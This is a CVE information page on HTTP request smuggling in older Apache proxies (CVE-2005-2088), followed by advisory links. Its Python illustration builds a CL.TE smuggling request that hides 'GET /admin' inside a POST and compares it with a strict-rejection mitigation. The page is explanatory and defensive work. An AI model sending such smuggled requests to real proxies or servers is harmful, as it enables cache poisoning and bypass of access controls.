CVE-2005-2088 Information

Description

The Apache HTTP Server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request that carries both a "Transfer-Encoding: chunked" header and a Content-Length header. Apache incorrectly handles and forwards the body of such a request, so that the receiving server processes part of it as a separate HTTP request, aka "HTTP Request Smuggling."
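The framing ambiguity the description refers to, shown as an added Python example (this is not code from this page or from Apache httpd): one constructed request stream is framed first by a hop that honors Content-Length and then by a hop that honors Transfer-Encoding, and the two hops disagree about how many requests the bytes contain. The hostnames and paths are invented, and the two policies are a generic model of a CL.TE desync rather than the exact code path of any Apache release; the "strict" policy is the usual proxy-side mitigation.

```python
# Added illustration of the CL.TE framing ambiguity behind CVE-2005-2088.
# Constructed demonstration code, not Apache httpd source: it models two
# generic framing policies, not the exact logic of any Apache release.
from typing import Dict, List, Tuple

CRLF = b"\r\n"


def parse_headers(buf: bytes) -> Tuple[bytes, Dict[bytes, bytes], bytes]:
    """Split one request head off the stream; header names are lower-cased."""
    head, sep, rest = buf.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(CRLF)
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def read_chunked(rest: bytes) -> Tuple[bytes, bytes]:
    """Decode a chunked body; return (body, bytes left on the connection)."""
    body = b""
    while True:
        size_line, _, rest = rest.partition(CRLF)
        size = int(size_line.split(b";")[0], 16)  # chunk extensions ignored
        if size == 0:
            # consume optional trailers up to the empty line that ends the body
            while True:
                line, _, rest = rest.partition(CRLF)
                if line == b"":
                    return body, rest
        body += rest[:size]
        rest = rest[size + len(CRLF):]  # skip chunk data and its trailing CRLF


def is_ambiguous(headers: Dict[bytes, bytes]) -> bool:
    """True when a request carries both framing headers (the CVE's trigger)."""
    return b"transfer-encoding" in headers and b"content-length" in headers


def split_requests(stream: bytes, policy: str) -> List[Tuple[bytes, bytes]]:
    """Frame a byte stream into (request_line, body) pairs.

    "content-length": CL wins when both headers are present (a hop framing
                      like the proxy side of a CL.TE desync).
    "chunked":        TE wins, as RFC 7230 section 3.3.3 requires.
    "strict":         refuse ambiguous requests outright (safe proxy choice).
    """
    out: List[Tuple[bytes, bytes]] = []
    while stream:
        req_line, hdrs, rest = parse_headers(stream)
        if policy == "strict" and is_ambiguous(hdrs):
            raise ValueError("400: both Transfer-Encoding and Content-Length")
        chunked = hdrs.get(b"transfer-encoding", b"").lower() == b"chunked"
        cl = hdrs.get(b"content-length")
        if chunked and (policy != "content-length" or cl is None):
            body, stream = read_chunked(rest)
        elif cl is not None:
            n = int(cl)
            body, stream = rest[:n], rest[n:]
        else:
            body, stream = b"", rest
        out.append((req_line, body))
    return out


# Constructed attack stream (made-up host and paths): the outer POST's
# Content-Length covers the terminating chunk AND a second, smuggled request.
SMUGGLED = b"GET /admin HTTP/1.1" + CRLF + b"Host: victim.example" + CRLF + CRLF
TAIL = b"0" + CRLF + CRLF + SMUGGLED
ATTACK = (
    b"POST /upload HTTP/1.1" + CRLF
    + b"Host: victim.example" + CRLF
    + b"Content-Length: " + str(len(TAIL)).encode() + CRLF
    + b"Transfer-Encoding: chunked" + CRLF + CRLF
    + TAIL
)


def desync_demo() -> Tuple[int, int]:
    """Requests each hop sees in the same bytes: (CL-framing hop, TE-framing hop)."""
    return (len(split_requests(ATTACK, "content-length")),
            len(split_requests(ATTACK, "chunked")))


if __name__ == "__main__":
    cl_hop, te_hop = desync_demo()
    print("content-length hop sees", cl_hop, "request(s)")
    print("chunked hop sees", te_hop, "request(s)")
    for line, body in split_requests(ATTACK, "chunked"):
        print("  ", line, "body=%r" % body)
```

The proxy-side hop forwards the whole 50-byte "body" as one request, while the origin, framing by Transfer-Encoding, ends the POST at the zero chunk and then parses GET /admin as a fresh request on the same connection, which is the cache-poisoning and filter-bypass primitive the description names. The check a proxy wants is the "strict" branch: a request with both headers is rejected (or, at minimum, Content-Length is dropped so every hop frames by Transfer-Encoding) before anything is forwarded.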

Reference

http://docs.info.apple.com/article.html?artnum=302847
http://lists.trustix.org/pipermail/tsl-announce/2005-October/000354.html
http://marc.info/?l=apache-httpd-announce&m=112931556417329&w=3
http://seclists.org/lists/bugtraq/2005/Jun/0025.html
http://secunia.com/advisories/14530
http://secunia.com/advisories/17319
http://secunia.com/advisories/17487
http://secunia.com/advisories/17813
http://secunia.com/advisories/19072
http://secunia.com/advisories/19073
http://secunia.com/advisories/19185
http://secunia.com/advisories/19317
http://secunia.com/advisories/23074
http://securityreason.com/securityalert/604
http://securitytracker.com/id?1014323
http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.600000
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.apache.org/dist/httpd/CHANGES_1.3
http://www.apache.org/dist/httpd/CHANGES_2.0
http://www.debian.org/security/2005/dsa-803
http://www.debian.org/security/2005/dsa-805
http://www.mandriva.com/security/advisories?name=MDKSA-2005:130
http://www.novell.com/linux/security/advisories/2005_18_sr.html
http://www.novell.com/linux/security/advisories/2005_46_apache.html
http://www.redhat.com/support/errata/RHSA-2005-582.html
http://www.securiteam.com/securityreviews/5GP0220G0U.html
http://www.securityfocus.com/archive/1/428138/100/0/threaded
http://www.securityfocus.com/bid/14106
http://www.securityfocus.com/bid/15647
http://www.ubuntu.com/usn/usn-160-2
http://www.vupen.com/english/advisories/2005/2140
http://www.vupen.com/english/advisories/2005/2659
http://www.vupen.com/english/advisories/2006/0789
http://www.vupen.com/english/advisories/2006/1018
http://www.vupen.com/english/advisories/2006/4680
http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf
http://www-1.ibm.com/support/search.wss?rs=0&q=PK13959&apar=only
http://www-1.ibm.com/support/search.wss?rs=0&q=PK16139&apar=only
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00612828
https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac@%3Ccvs.httpd.apache.org%3E
https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79@%3Ccvs.httpd.apache.org%3E
https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc@%3Ccvs.httpd.apache.org%3E
https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb@%3Ccvs.httpd.apache.org%3E
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11452
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1237
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1526
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1629
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A840
https://secure-support.novell.com/KanisaPlatform/Publishing/741/3222109_f.SAL_Public.html